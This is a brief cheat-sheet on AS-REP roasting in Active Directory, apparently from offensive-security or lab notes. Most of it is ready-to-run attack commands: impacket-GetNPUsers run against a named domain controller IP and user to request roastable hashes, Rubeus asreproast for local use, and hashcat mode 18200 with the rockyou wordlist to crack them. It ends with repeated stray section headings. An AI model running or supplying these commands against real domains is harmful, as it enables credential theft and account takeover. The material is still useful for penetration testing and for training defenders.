AS-REP-Roasting

Authentication Server Response (AS-REP) Roasting enables attackers to request encrypted authentication responses for accounts in Active Directory that have Kerberos pre-authentication disabled.

Remote

Usable without credentials. With the use of credentials it searches for other users which have pre-authentication disabled. AS-REP roasting

sudo impacket-GetNPUsers -dc-ip 192.168.206.70  -request -outputfile hashes.asreproast corp.com/dave

Local

.\Rubeus.exe asreproast /nowrap

Cracking

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt

Remote​

Local​

Cracking​

Remote

Local

Cracking